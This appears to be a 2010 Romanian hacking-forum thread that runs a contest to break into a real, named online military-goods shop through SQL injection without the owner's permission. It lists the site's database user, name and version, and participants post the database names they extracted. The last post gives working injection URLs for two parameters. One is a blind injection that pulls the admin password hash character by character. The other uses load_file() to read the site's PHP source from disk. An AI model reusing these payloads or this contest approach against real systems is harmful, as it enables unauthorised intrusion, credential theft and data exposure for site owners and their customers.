tdxev Posted April 9, 2010 Report Posted April 9, 2010 Scopul este g?sirea vulnerabilitati SQL si aflarea bazelor de date folosindacea vulnerabilitate.Fiecare care va reusi sa gaseasca numele bazelor de date va post numele uniea dintre ele ! (nu postati linkul folosit)Pentru a valida faptul ca nu a folosit alta vulnerabilitarte din sitetrimite-ti si link-ul prin PM catre mine.Toate link-urile vor fi facute publice la finalul competitiei.Puteti sa folositi orice program doriti (dar recomand lucru manual pentru ca o sa face-ti ceva trafic pe sitedaca folositi toti programe)!!!Site:http://www.military-shop.ro/moreInfo:user():webweb2dataBase():militaryshopversion():5.0.51aIncep primul:albumfotoVulnerabilitatea o voi anunta peste o saptamana, asa ca mai sunt 7 zile Quote
ROFL Posted April 9, 2010 Report Posted April 9, 2010 (edited) Later edit:huntingshop2 Edited April 9, 2010 by ROFL Quote
tdxev Posted April 9, 2010 Author Report Posted April 9, 2010 a fost deja anuntata de mine "dataBase():militaryshop" ea poate fi gasita simplu printr-o erroare MySql "select 1 from numeTabelCeNuExista"Alta inafara de mysql, information_scheme,test mai sunt aproximativ 30 si ceva... Quote
tdxev Posted April 9, 2010 Author Report Posted April 9, 2010 dap huntingshop2 este buna trimite-mi si linkul 1 Quote
ROFL Posted April 9, 2010 Report Posted April 9, 2010 dap huntingshop2 este buna trimite-mi si linkulDone ! Quote
tdxev Posted April 22, 2010 Author Report Posted April 22, 2010 Gata azi raportez vulnerabilitatile!Am facut acest post pentru ca initial am crezut ca era vorba de un singur parametru vulnerabil in site acela fiind un blind injection!Parametru gasit de mine:http://www.military-shop.ro/advanced_search_result.php?keywords=Sintaxa folosita http://www.military-shop.ro/advanced_search_result.php?keywords=xxxxx%' union distinct select 1,28 FROM mysql.user WHERE substring((select distinct (user_password) FRoM administrators limit 0,1),1,1)='0' %23Parametru gasit de ROFL (care a gasit calea cea mai usoara) va fi afisat dupa ce vor rezolva problema!LATER:Parametru gasit de ROLF este:http://www.military-shop.ro/index.php?products_id=Sintaxa:http://www.military-shop.ro/index.php?products_id=-2326 union select 1,load_file(0x2f7661722f7777772f6d696c69746172792d73686f702e726f2f696e6465782e706870)-- Quote